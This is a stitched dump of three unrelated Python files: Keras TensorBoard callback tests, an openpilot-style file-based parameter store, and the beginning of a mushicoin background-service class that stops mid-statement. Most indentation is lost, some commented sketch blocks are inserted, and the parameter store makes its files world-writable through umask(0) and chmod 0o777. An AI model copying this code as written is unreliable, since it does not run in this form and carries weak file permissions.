cb_list.on_train_batch_end(0, logs)
cb_list.on_epoch_end(0, logs)
cb_list.on_train_end(logs)
cb_list.on_test_begin(logs)
cb_list.on_test_batch_begin(0, logs)
cb_list.on_test_batch_end(0, logs)
cb_list.on_test_end(logs)
cb_list.on_predict_begin(logs)
cb_list.on_predict_batch_begin(0, logs)
cb_list.on_predict_batch_end(0, logs)
cb_list.on_predict_end(logs)
# Note that this test specifies model_type explicitly.
@test_combinations.run_all_keras_modes(always_skip_v1=True)
class TestTensorBoardV2NonParameterizedTest(test_combinations.TestCase):
def setUp(self):
super(TestTensorBoardV2NonParameterizedTest, self).setUp()
self.logdir = os.path.join(self.get_temp_dir(), 'tb')
self.train_dir = os.path.join(self.logdir, 'train')
self.validation_dir = os.path.join(self.logdir, 'validation')
def _get_seq_model(self):
model = keras.models.Sequential([
keras.layers.Conv2D(8, (3, 3), input_shape=(10, 10, 1)),
keras.layers.Flatten(),
keras.layers.Dense(1),
])
opt = gradient_descent.SGD(learning_rate=0.001)
model.compile(
opt,
'mse',
run_eagerly=test_utils.should_run_eagerly())
return model
def _count_trace_file(self, logdir):
profile_dir = os.path.join(logdir, 'plugins', 'profile')
count = 0
for (dirpath, dirnames, filenames) in os.walk(profile_dir):
del dirpath # unused
del dirnames # unused
for filename in filenames:
if filename.endswith('.trace.json.gz'):
count += 1
return count
def fitModelAndAssertKerasModelWritten(self, model):
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir,
write_graph=True,
profile_batch=0)
model.fit(
x,
y,
batch_size=2,
epochs=3,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
_ObservedSummary(logdir=self.train_dir, tag='keras'),
},
)
if not model.run_eagerly:
# There should be one train graph
self.assertLen(summary_file.graph_defs, 1)
for graph_def in summary_file.graph_defs:
graph_def_str = str(graph_def)
# All the model layers should appear in the graphs
for layer in model.layers:
if 'input' not in layer.name:
self.assertIn(layer.name, graph_def_str)
def test_TensorBoard_writeSequentialModel_noInputShape(self):
model = keras.models.Sequential([
keras.layers.Conv2D(8, (3, 3)),
keras.layers.Flatten(),
keras.layers.Dense(1),
])
model.compile('sgd', 'mse', run_eagerly=test_utils.should_run_eagerly())
self.fitModelAndAssertKerasModelWritten(model)
def test_TensorBoard_writeSequentialModel_withInputShape(self):
model = keras.models.Sequential([
keras.layers.Conv2D(8, (3, 3), input_shape=(10, 10, 1)),
keras.layers.Flatten(),
keras.layers.Dense(1),
])
model.compile('sgd', 'mse', run_eagerly=test_utils.should_run_eagerly())
self.fitModelAndAssertKerasModelWritten(model)
def test_TensorBoard_writeModel(self):
inputs = keras.layers.Input([10, 10, 1])
x = keras.layers.Conv2D(8, (3, 3), activation='relu')(inputs)
x = keras.layers.Flatten()(x)
x = keras.layers.Dense(1)(x)
model = keras.models.Model(inputs=inputs, outputs=[x])
model.compile('sgd', 'mse', run_eagerly=test_utils.should_run_eagerly())
self.fitModelAndAssertKerasModelWritten(model)
def test_TensorBoard_autoTrace(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=1, write_graph=False)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
_ObservedSummary(logdir=self.train_dir, tag=u'batch_1'),
},
)
self.assertEqual(1, self._count_trace_file(logdir=self.logdir))
def test_TensorBoard_autoTrace_outerProfiler(self):
"""Runs a profiler session that interferes with the one from the callback.
The callback will not generate a profile but execution will proceed without
crashing due to unhandled exceptions.
"""
tf.profiler.experimental.start(logdir='')
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=1, write_graph=False)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
tf.profiler.experimental.stop(save=False)
self.assertEqual(
summary_file.tensors,
{
_ObservedSummary(logdir=self.train_dir, tag=u'batch_1'),
},
)
self.assertEqual(0, self._count_trace_file(logdir=self.train_dir))
def test_TensorBoard_autoTrace_tagNameWithBatchNum(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=2, write_graph=False)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
_ObservedSummary(logdir=self.train_dir, tag=u'batch_2'),
},
)
self.assertEqual(1, self._count_trace_file(logdir=self.logdir))
def test_TensorBoard_autoTrace_profileBatchRangeSingle(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch='2,2', write_graph=False)
model.fit(
x,
y,
batch_size=3,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
# Trace will be logged once at the batch it stops profiling.
_ObservedSummary(logdir=self.train_dir, tag=u'batch_2'),
},
)
self.assertEqual(1, self._count_trace_file(logdir=self.logdir))
def test_TensorBoard_autoTrace_profileBatchRangeTwice(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch='10,10', write_graph=False)
model.fit(
x,
y,
batch_size=3,
epochs=10,
validation_data=(x, y),
callbacks=[tb_cbk])
time.sleep(1) # Avoids the second profile over-writing the first.
model.fit(
x,
y,
batch_size=3,
epochs=10,
validation_data=(x, y),
callbacks=[tb_cbk])
self.assertEqual(2, self._count_trace_file(logdir=self.logdir))
# Test case that replicates a Github issue.
# https://github.com/tensorflow/tensorflow/issues/37543
def test_TensorBoard_autoTrace_profileTwiceGraphMode(self):
tf.compat.v1.disable_eager_execution()
inp = keras.Input((1,))
out = keras.layers.Dense(units=1)(inp)
model = keras.Model(inp, out)
model.compile(gradient_descent.SGD(1), 'mse')
logdir = os.path.join(self.get_temp_dir(), 'tb1')
model.fit(
np.zeros((64, 1)),
np.zeros((64, 1)),
batch_size=32,
callbacks=[keras.callbacks.TensorBoard(logdir, profile_batch=1)],
)
# Verifies trace exists in the first logdir.
self.assertEqual(1, self._count_trace_file(logdir=logdir))
logdir = os.path.join(self.get_temp_dir(), 'tb2')
model.fit(
np.zeros((64, 1)),
np.zeros((64, 1)),
batch_size=32,
callbacks=[keras.callbacks.TensorBoard(logdir, profile_batch=2)],
)
# Verifies trace exists in the second logdir.
self.assertEqual(1, self._count_trace_file(logdir=logdir))
def test_TensorBoard_autoTrace_profileBatchRange(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch='1,3', write_graph=False)
model.fit(
x,
y,
batch_size=4,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
# Trace will be logged once at the batch it stops profiling.
_ObservedSummary(logdir=self.train_dir, tag=u'batch_3'),
},
)
self.assertEqual(1, self._count_trace_file(logdir=self.logdir))
def test_TensorBoard_autoTrace_profileInvalidBatchRange(self):
with self.assertRaises(ValueError):
keras.callbacks.TensorBoard(
self.logdir,
histogram_freq=1,
profile_batch='-1,3',
write_graph=False)
with self.assertRaises(ValueError):
keras.callbacks.TensorBoard(
self.logdir,
histogram_freq=1,
profile_batch='1,None',
write_graph=False)
with self.assertRaises(ValueError):
keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch='6,5', write_graph=False)
with self.assertRaises(ValueError):
keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=-1, write_graph=False)
def test_TensorBoard_autoTrace_profile_batch_largerThanBatchCount(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=10000, write_graph=False)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
# Profiling was set for batch 10000, which is never reached, so no trace summary or file should exist.
self.assertEmpty(summary_file.tensors)
self.assertEqual(0, self._count_trace_file(logdir=self.train_dir))
class MostRecentlyModifiedFileMatchingPatternTest(tf.test.TestCase):
def test_get_most_recently_modified_file_matching_pattern(self):
file_pattern = 'f.batch{batch:02d}epoch{epoch:02d}.h5'
test_dir = self.get_temp_dir()
path_pattern = os.path.join(test_dir, file_pattern)
file_paths = [
os.path.join(test_dir, file_name) for file_name in
['f.batch03epoch02.h5', 'f.batch02epoch02.h5', 'f.batch01epoch01.h5']
]
for file_path in file_paths:
with open(file_path, 'w') as f:
# Sleep so the files get distinct modification times.
time.sleep(2)
f.write('foo bar')
# Ensure the files have been actually written.
self.assertEqual(
set([
os.path.join(test_dir, file_name)
for file_name in os.listdir(test_dir)
]), set(file_paths))
self.assertEqual(
keras.callbacks.ModelCheckpoint(None)
._get_most_recently_modified_file_matching_pattern(path_pattern),
file_paths[-1])
def test_some_file_not_matching_pattern(self):
file_pattern = 'f.batch{batch:02d}epoch{epoch:02d}.h5'
test_dir = self.get_temp_dir()
path_pattern = os.path.join(test_dir, file_pattern)
file_paths = [
os.path.join(test_dir, file_name) for file_name in
['f.batch03epoch02.h5', 'f.batch02epoch02.h5', 'f.baatch01epoch01.h5']
]
for file_path in file_paths:
with open(file_path, 'w') as f:
# Sleep so the files get distinct modification times.
time.sleep(2)
f.write('foo bar')
self.assertEqual(
keras.callbacks.ModelCheckpoint(None)
._get_most_recently_modified_file_matching_pattern(path_pattern),
file_paths[-2])
def test_get_same_file_if_file_name_equals_pattern(self):
file_name = 'f.batch02.h5'
test_dir = self.get_temp_dir()
file_path = os.path.join(test_dir, file_name)
with open(file_path, 'w') as f:
f.write('foo bar')
self.assertEqual(os.path.join(test_dir, os.listdir(test_dir)[0]), file_path)
self.assertEqual(
keras.callbacks.ModelCheckpoint(
None)._get_most_recently_modified_file_matching_pattern(file_path),
file_path)
def test_get_none_if_file_does_not_exist(self):
file_name = 'f.batch02.h5'
test_dir = self.get_temp_dir()
file_path = os.path.join(test_dir, file_name)
self.assertLen(os.listdir(test_dir), 0)
self.assertEqual(
keras.callbacks.ModelCheckpoint(
None)._get_most_recently_modified_file_matching_pattern(file_path),
None)
def test_using_checkpoint_management_latest_checkpoint(self):
file_pattern = 'f.batch{batch:02d}epoch{epoch:02d}'
ckpt_file_name = 'f.batchXepochY'
test_dir = self.get_temp_dir()
path_pattern = os.path.join(test_dir, file_pattern)
ckpt_file_path = os.path.join(test_dir, ckpt_file_name)
with open(ckpt_file_path, 'w') as f:
f.write('dummy ckpt')
tf.__internal__.train.update_checkpoint_state(
test_dir, ckpt_file_path)
file_paths = [
os.path.join(test_dir, file_name)
for file_name in ['f.batch03epoch02', 'f.batch02epoch02']
]
for file_path in file_paths:
with open(file_path, 'w') as f:
f.write('foo bar')
# The result returned from checkpoint_management.latest_checkpoint takes
# priority, so even if it was written earlier, we should still return that.
self.assertEqual(
keras.callbacks.ModelCheckpoint(None)
._get_most_recently_modified_file_matching_pattern(path_pattern),
ckpt_file_path)
class SummaryOpsTest(tf.test.TestCase):
def tearDown(self):
super(SummaryOpsTest, self).tearDown()
tf.summary.trace_off()
def keras_model(self, *args, **kwargs):
logdir = self.get_temp_dir()
writer = tf.summary.create_file_writer(logdir)
with writer.as_default():
keras.callbacks.keras_model_summary(*args, **kwargs)
writer.close()
events = events_from_logdir(logdir)
# The first event contains no summary values. The written content goes to
# the second event.
return events[1]
@test_utils.run_v2_only
def testKerasModel(self):
model = keras.Sequential(
[Dense(10, input_shape=(100,)),
Activation('relu', name='my_relu')])
event = self.keras_model(name='my_name', data=model, step=1)
first_val = event.summary.value[0]
self.assertEqual(model.to_json(), first_val.tensor.string_val[0].decode())
@test_utils.run_v2_only
def testKerasModel_usesDefaultStep(self):
model = keras.Sequential(
[Dense(10, input_shape=(100,)),
Activation('relu', name='my_relu')])
try:
tf.summary.experimental.set_step(42)
event = self.keras_model(name='my_name', data=model)
self.assertEqual(42, event.step)
finally:
# Reset to default state for other tests.
tf.summary.experimental.set_step(None)
@test_utils.run_v2_only
def testKerasModel_subclass(self):
class SimpleSubclass(keras.Model):
def __init__(self):
super(SimpleSubclass, self).__init__(name='subclass')
self.dense = Dense(10, input_shape=(100,))
self.activation = Activation('relu', name='my_relu')
def call(self, inputs):
x = self.dense(inputs)
return self.activation(x)
# Intentionally erroring out at json serialization to test the warning.
def get_config(self):
raise NotImplementedError
model = SimpleSubclass()
with tf.compat.v1.test.mock.patch.object(logging, 'warning') as mock_log:
self.assertFalse(
keras.callbacks.keras_model_summary(
name='my_name', data=model, step=1))
self.assertRegex(
str(mock_log.call_args), 'Model failed to serialize as JSON.')
@test_utils.run_v2_only
def testKerasModel_otherExceptions(self):
model = keras.Sequential()
with tf.compat.v1.test.mock.patch.object(model, 'to_json') as mock_to_json:
with tf.compat.v1.test.mock.patch.object(logging, 'warning') as mock_log:
mock_to_json.side_effect = Exception('oops')
self.assertFalse(
keras.callbacks.keras_model_summary(
name='my_name', data=model, step=1))
self.assertRegex(
str(mock_log.call_args),
'Model failed to serialize as JSON. Ignoring')
def events_from_file(filepath):
"""Returns all events in a single event file.
Args:
filepath: Path to the event file.
Returns:
A list of all tf.Event protos in the event file.
"""
result = []
raw_dataset = tf.data.TFRecordDataset([filepath])
for raw_record in raw_dataset.take(10):
event = tf.compat.v1.Event()
event.ParseFromString(raw_record.numpy())
result.append(event)
return result
def events_from_logdir(logdir):
"""Returns all events in the single eventfile in logdir.
Args:
logdir: The directory in which the single event file is sought.
Returns:
A list of all tf.Event protos from the single event file.
Raises:
AssertionError: If logdir does not contain exactly one file.
"""
assert tf.compat.v1.gfile.Exists(logdir)
files = tf.compat.v1.gfile.ListDirectory(logdir)
assert len(files) == 1, 'Expected exactly one file in logdir, found: %s' % files
return events_from_file(os.path.join(logdir, files[0]))
if __name__ == '__main__':
tf.test.main()
params.py
#!/usr/bin/env python3
"""ROS has a parameter server, we have files.
The parameter store is a persistent key value store, implemented as a directory with a writer lock.
On Android, we store params under params_dir = /data/params. The writer lock is a file
"<params_dir>/.lock" taken using flock(), and data is stored in a directory symlinked to by
"<params_dir>/d".
Each key-value pair is stored as a file named <key> with contents <value>, located at
<params_dir>/d/<key>
Readers of a single key can just open("<params_dir>/d/<key>") and read the file contents.
Readers who want a consistent snapshot of multiple keys should take the lock.
Writers should take the lock before modifying anything. Writers should also leave the DB in a
consistent state after a crash. The implementation below does this by copying all params to a temp
directory <params_dir>/<tmp>, then atomically symlinking <params_dir>/<d> to <params_dir>/<tmp>
before deleting the old <params_dir>/<d> directory.
Writers that only modify a single key can simply take the lock, then swap the corresponding value
file in place without messing with <params_dir>/d.
"""
import time
import os
import errno
import shutil
import fcntl
import tempfile
import threading
from enum import Enum
from common.basedir import PARAMS
def mkdirs_exists_ok(path):
try:
os.makedirs(path)
except OSError:
if not os.path.isdir(path):
raise
class TxType(Enum):
PERSISTENT = 1
CLEAR_ON_MANAGER_START = 2
CLEAR_ON_PANDA_DISCONNECT = 3
class UnknownKeyName(Exception):
pass
keys = {
"AccessToken": [TxType.CLEAR_ON_MANAGER_START],
"AthenadPid": [TxType.PERSISTENT],
"CalibrationParams": [TxType.PERSISTENT],
"CarParams": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CarParamsCache": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CarVin": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CommunityFeaturesToggle": [TxType.PERSISTENT],
"CompletedTrainingVersion": [TxType.PERSISTENT],
"ControlsParams": [TxType.PERSISTENT],
"DisablePowerDown": [TxType.PERSISTENT],
"DisableUpdates": [TxType.PERSISTENT],
"DoUninstall": [TxType.CLEAR_ON_MANAGER_START],
"DongleId": [TxType.PERSISTENT],
"GitBranch": [TxType.PERSISTENT],
"GitCommit": [TxType.PERSISTENT],
"GitRemote": [TxType.PERSISTENT],
"GithubSshKeys": [TxType.PERSISTENT],
"HasAcceptedTerms": [TxType.PERSISTENT],
"HasCompletedSetup": [TxType.PERSISTENT],
"IsDriverViewEnabled": [TxType.CLEAR_ON_MANAGER_START],
"IsOpenpilotViewEnabled": [TxType.CLEAR_ON_MANAGER_START],
"IsLdwEnabled": [TxType.PERSISTENT],
"IsGeofenceEnabled": [TxType.PERSISTENT],
"IsMetric": [TxType.PERSISTENT],
"IsOffroad": [TxType.CLEAR_ON_MANAGER_START],
"IsRHD": [TxType.PERSISTENT],
"IsTakingSnapshot": [TxType.CLEAR_ON_MANAGER_START],
"IsUpdateAvailable": [TxType.CLEAR_ON_MANAGER_START],
"IsUploadRawEnabled": [TxType.PERSISTENT],
"LastAthenaPingTime": [TxType.PERSISTENT],
"LastUpdateTime": [TxType.PERSISTENT],
"LimitSetSpeed": [TxType.PERSISTENT],
"LimitSetSpeedNeural": [TxType.PERSISTENT],
"LiveParameters": [TxType.PERSISTENT],
"LongitudinalControl": [TxType.PERSISTENT],
"OpenpilotEnabledToggle": [TxType.PERSISTENT],
"LaneChangeEnabled": [TxType.PERSISTENT],
"PandaFirmware": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"PandaFirmwareHex": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"PandaDongleId": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Passive": [TxType.PERSISTENT],
"RecordFront": [TxType.PERSISTENT],
"ReleaseNotes": [TxType.PERSISTENT],
"ShouldDoUpdate": [TxType.CLEAR_ON_MANAGER_START],
"SpeedLimitOffset": [TxType.PERSISTENT],
"SubscriberInfo": [TxType.PERSISTENT],
"TermsVersion": [TxType.PERSISTENT],
"TrainingVersion": [TxType.PERSISTENT],
"UpdateAvailable": [TxType.CLEAR_ON_MANAGER_START],
"UpdateFailedCount": [TxType.CLEAR_ON_MANAGER_START],
"Version": [TxType.PERSISTENT],
"Offroad_ChargeDisabled": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Offroad_ConnectivityNeeded": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_ConnectivityNeededPrompt": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_TemperatureTooHigh": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_PandaFirmwareMismatch": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Offroad_InvalidTime": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_IsTakingSnapshot": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_NeosUpdate": [TxType.CLEAR_ON_MANAGER_START],
"OpkrAutoShutdown": [TxType.PERSISTENT],
"OpkrAutoScreenOff": [TxType.PERSISTENT],
"OpkrUIBrightness": [TxType.PERSISTENT],
"OpkrEnableDriverMonitoring": [TxType.PERSISTENT],
"OpkrEnableLogger": [TxType.PERSISTENT],
"OpkrEnableGetoffAlert": [TxType.PERSISTENT],
"OpkrEnableLearner": [TxType.PERSISTENT],
"OpkrAutoResume": [TxType.PERSISTENT],
"OpkrAccelProfile": [TxType.PERSISTENT],
"OpkrAutoLanechangedelay": [TxType.PERSISTENT],
"OpkrRunMixplorer": [TxType.PERSISTENT],
"OpkrRunQuickedit": [TxType.PERSISTENT],
"OpkrRunSoftkey": [TxType.PERSISTENT],
"OpkrRunNavigation": [TxType.PERSISTENT],
"OpkrBootNavigation": [TxType.PERSISTENT],
"PutPrebuiltOn": [TxType.PERSISTENT],
"FingerprintIssuedFix": [TxType.PERSISTENT],
"LdwsCarFix": [TxType.PERSISTENT],
"LateralControlMethod": [TxType.PERSISTENT],
"CruiseStatemodeSelInit": [TxType.PERSISTENT],
"LateralControlPriority": [TxType.PERSISTENT],
}
def fsync_dir(path):
fd = os.open(path, os.O_RDONLY)
try:
os.fsync(fd)
finally:
os.close(fd)
class FileLock():
def __init__(self, path, create):
self._path = path
self._create = create
self._fd = None
def acquire(self):
self._fd = os.open(self._path, os.O_CREAT if self._create else 0)
fcntl.flock(self._fd, fcntl.LOCK_EX)
def release(self):
if self._fd is not None:
os.close(self._fd)
self._fd = None
class DBAccessor():
def __init__(self, path):
self._path = path
self._vals = None
def keys(self):
self._check_entered()
return self._vals.keys()
def get(self, key):
self._check_entered()
if self._vals is None:
return None
try:
return self._vals[key]
except KeyError:
return None
def _get_lock(self, create):
lock = FileLock(os.path.join(self._path, ".lock"), create)
lock.acquire()
return lock
def _read_values_locked(self):
"""Callers should hold a lock while calling this method."""
vals = {}
try:
data_path = self._data_path()
keys = os.listdir(data_path)
for key in keys:
with open(os.path.join(data_path, key), "rb") as f:
vals[key] = f.read()
except (OSError, IOError) as e:
# Either the DB hasn't been created yet, or somebody wrote a bug and left the DB in an
# inconsistent state. Either way, return empty.
if e.errno == errno.ENOENT:
return {}
return vals
def _data_path(self):
return os.path.join(self._path, "d")
def _check_entered(self):
if self._vals is None:
raise Exception("Must call __enter__ before using DB")
class DBReader(DBAccessor):
def __enter__(self):
try:
lock = self._get_lock(False)
except OSError as e:
# Do not create lock if it does not exist.
if e.errno == errno.ENOENT:
self._vals = {}
return self
try:
# Read everything.
self._vals = self._read_values_locked()
return self
finally:
lock.release()
def __exit__(self, exc_type, exc_value, traceback):
pass
class DBWriter(DBAccessor):
def __init__(self, path):
super(DBWriter, self).__init__(path)
self._lock = None
self._prev_umask = None
def put(self, key, value):
self._vals[key] = value
def delete(self, key):
self._vals.pop(key, None)
def __enter__(self):
mkdirs_exists_ok(self._path)
# Make sure we can write and that permissions are correct.
self._prev_umask = os.umask(0)
try:
os.chmod(self._path, 0o777)
self._lock = self._get_lock(True)
self._vals = self._read_values_locked()
except Exception:
os.umask(self._prev_umask)
self._prev_umask = None
raise
return self
def __exit__(self, exc_type, exc_value, traceback):
self._check_entered()
try:
# data_path refers to the externally used path to the params. It is a symlink.
# old_data_path is the path currently pointed to by data_path.
# tempdir_path is a path where the new params will go, which the new data path will point to.
# new_data_path is a temporary symlink that will atomically overwrite data_path.
#
# The current situation is:
# data_path -> old_data_path
# We're going to write params data to tempdir_path
# tempdir_path -> params data
# Then point new_data_path to tempdir_path
# new_data_path -> tempdir_path
# Then atomically overwrite data_path with new_data_path
# data_path -> tempdir_path
old_data_path = None
new_data_path = None
tempdir_path = tempfile.mkdtemp(prefix=".tmp", dir=self._path)
try:
# Write back all keys.
os.chmod(tempdir_path, 0o777)
for k, v in self._vals.items():
with open(os.path.join(tempdir_path, k), "wb") as f:
f.write(v)
f.flush()
os.fsync(f.fileno())
fsync_dir(tempdir_path)
data_path = self._data_path()
try:
old_data_path = os.path.join(self._path, os.readlink(data_path))
except (OSError, IOError):
# NOTE(mgraczyk): If other DB implementations have bugs, this could cause
# copies to be left behind, but we still want to overwrite.
pass
new_data_path = "{}.link".format(tempdir_path)
os.symlink(os.path.basename(tempdir_path), new_data_path)
os.rename(new_data_path, data_path)
fsync_dir(self._path)
finally:
# If the rename worked, we can delete the old data. Otherwise delete the new one.
success = new_data_path is not None and os.path.exists(data_path) and (
os.readlink(data_path) == os.path.basename(tempdir_path))
if success:
if old_data_path is not None:
shutil.rmtree(old_data_path)
else:
shutil.rmtree(tempdir_path)
# Regardless of what happened above, there should be no link at new_data_path.
if new_data_path is not None and os.path.islink(new_data_path):
os.remove(new_data_path)
finally:
os.umask(self._prev_umask)
self._prev_umask = None
# Always release the lock.
self._lock.release()
self._lock = None
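# --- Illustrative sketch (not part of the original module) ---
# A minimal, standalone rendering of the atomic-swap pattern used by
# DBWriter.__exit__ above: write the new key files into a fresh temp
# directory, point a temporary symlink at it, then atomically rename that
# symlink over the live "d" link. Paths and argument names are illustrative.
def _example_atomic_swap(base_path, new_vals):
    data_link = os.path.join(base_path, "d")
    tempdir_path = tempfile.mkdtemp(prefix=".tmp", dir=base_path)
    for k, v in new_vals.items():
        with open(os.path.join(tempdir_path, k), "wb") as f:
            f.write(v)
            f.flush()
            os.fsync(f.fileno())
    fsync_dir(tempdir_path)
    new_link = tempdir_path + ".link"
    os.symlink(os.path.basename(tempdir_path), new_link)
    os.rename(new_link, data_link)  # atomic replace of the old symlink
    fsync_dir(base_path)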
def read_db(params_path, key):
path = "%s/d/%s" % (params_path, key)
try:
with open(path, "rb") as f:
return f.read()
except IOError:
return None
def write_db(params_path, key, value):
if isinstance(value, str):
value = value.encode('utf8')
prev_umask = os.umask(0)
lock = FileLock(params_path + "/.lock", True)
lock.acquire()
try:
tmp_path = tempfile.mktemp(prefix=".tmp", dir=params_path)
with open(tmp_path, "wb") as f:
f.write(value)
f.flush()
os.fsync(f.fileno())
path = "%s/d/%s" % (params_path, key)
os.rename(tmp_path, path)
fsync_dir(os.path.dirname(path))
finally:
os.umask(prev_umask)
lock.release()
class Params():
def __init__(self, db=PARAMS):
self.db = db
# create the database if it doesn't exist...
if not os.path.exists(self.db + "/d"):
with self.transaction(write=True):
pass
def clear_all(self):
shutil.rmtree(self.db, ignore_errors=True)
with self.transaction(write=True):
pass
def transaction(self, write=False):
if write:
return DBWriter(self.db)
else:
return DBReader(self.db)
def _clear_keys_with_type(self, tx_type):
with self.transaction(write=True) as txn:
for key in keys:
if tx_type in keys[key]:
txn.delete(key)
def manager_start(self):
self._clear_keys_with_type(TxType.CLEAR_ON_MANAGER_START)
def panda_disconnect(self):
self._clear_keys_with_type(TxType.CLEAR_ON_PANDA_DISCONNECT)
def delete(self, key):
with self.transaction(write=True) as txn:
txn.delete(key)
def get(self, key, block=False, encoding=None):
if key not in keys:
raise UnknownKeyName(key)
while 1:
ret = read_db(self.db, key)
if not block or ret is not None:
break
# is polling really the best we can do?
time.sleep(0.05)
if ret is not None and encoding is not None:
ret = ret.decode(encoding)
return ret
def put(self, key, dat):
"""
Warning: This function blocks until the param is written to disk!
In very rare cases this can take over a second, and your code will hang.
Use the put_nonblocking helper function in time sensitive code, but
in general try to avoid writing params as much as possible.
"""
if key not in keys:
raise UnknownKeyName(key)
write_db(self.db, key, dat)
def get_OpkrAutoShutdown(self):
cvt_dictionary = {
0:0,
1:1,
2:30,
3:60,
4:180,
5:300,
6:600,
7:1800,
8:3600,
9:10800,
10:18000,
}
# self.get() returns None while the param is unset, so the conversion itself
# must also live inside the try block.
value = 0
try:
nID = int(self.get("OpkrAutoShutdown"))
value = cvt_dictionary[nID]
except (TypeError, ValueError, KeyError):
value = 0
return value
def get_OpkrAutoLanechangedelay(self):
cvt_dictionary = {
0:0.0,
1:0.1,
2:0.5,
3:1.0,
4:1.5,
5:2.0,
}
# Same pattern as above: guard against an unset param and an unknown index.
value = 0.0
try:
nID = int(self.get("OpkrAutoLanechangedelay"))
value = cvt_dictionary[nID]
except (TypeError, ValueError, KeyError):
value = 0.0
return value
def put_nonblocking(key, val):
def f(key, val):
params = Params()
params.put(key, val)
t = threading.Thread(target=f, args=(key, val))
t.start()
return t
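# --- Illustrative sketch (not part of the original module) ---
# Rough usage of the Params API defined above. Any key used with get/put must
# be present in the `keys` dictionary; "IsMetric" is only an example and is
# assumed to be registered there.
def _example_params_usage():
    params = Params()
    params.put("IsMetric", "1")
    print(params.get("IsMetric", encoding='utf8'))
    params.delete("IsMetric")
    # Fire-and-forget write for time-sensitive code paths:
    put_nonblocking("IsMetric", "0")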
|
service.py
|
import queue
import sys
import threading
import traceback
from mushicoin import tools
from mushicoin.ntwrk.message import Order
class NoExceptionQueue(queue.Queue):
"""
In some cases, queue overflow is ignored. Necessary try, except blocks
make the code less readable. This is a special queue class that
simply ignores overflow.
"""
def __init__(self, maxsize=0):
queue.Queue.__init__(self, maxsize)
def put(self, item, block=True, timeout=None):
try:
queue.Queue.put(self, item, block, timeout)
except queue.Full:
pass
class Service:
"""
Service is a background job synchronizer.
It consists of an event loop, side threads and annotation helpers.
Event loop starts listening for upcoming events after registration.
If service is alive, all annotated methods are run in background
thread and results return depending on annotation type.
Side threads are executed repeatedly until service shuts down or
thread is forcefully closed from another thread. Each side-thread should
also check for infinite loops.
"""
INIT = 0
RUNNING = 1
STOPPED = 2
TERMINATED = 3
def __init__(self, name):
self.event_thread = threading.Thread()
self.into_service_queue = NoExceptionQueue(1000)
self.signals = {}
self.service_responses = {}
self.name = name
self.__state = None
self.execution_lock = threading.Lock()
self.__threads = {}
def register(self):
def service_target(service):
service.set_state(Service.RUNNING)
while service.get_state() == Service.RUNNING:
try:
order = service.into_service_queue.get(timeout=1)
if isinstance(order, Order):
result = Service.execute_order(service, order)
self.service_responses[order.id] = result
self.signals[order.id].set()
service.into_service_queue.task_done()
except TypeError:
service.set_state(Service.STOPPED)
self.service_responses[order.id] = True
self.signals[order.id].set()
except queue.Empty:
pass
def threaded_wrapper(func):
def insider(*args, **kwargs):
while self.__threads[func.__name__]["running"]:
try:
func(*args, **kwargs)
except Exception as e:
tools.log('Exception occurred at thread {}\n{}'.format(func.__name__, traceback.format_exc()))
return 0
return insider
cont = self.on_register()
if not cont:
